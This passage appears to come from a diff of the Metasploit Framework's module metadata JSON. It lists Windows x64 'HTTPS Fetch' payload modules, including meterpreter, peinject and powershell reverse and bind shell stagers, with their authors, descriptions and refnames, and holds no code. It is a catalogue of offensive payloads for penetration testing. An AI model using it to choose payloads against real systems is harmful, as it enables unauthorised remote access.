"2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_winhttp": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_winhttps": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/meterpreter_bind_named_pipe": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind Named Pipe Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "UserExistsError", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_bind_named_pipe", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_bind_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Bind TCP Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_http": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_https": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/https/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/peinject/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/peinject/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/peinject/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/peinject/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/pingback_reverse_tcp": { - "name": "HTTPS Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/https/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_bind_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/powershell_reverse_tcp_ssl": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/windows/https/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": 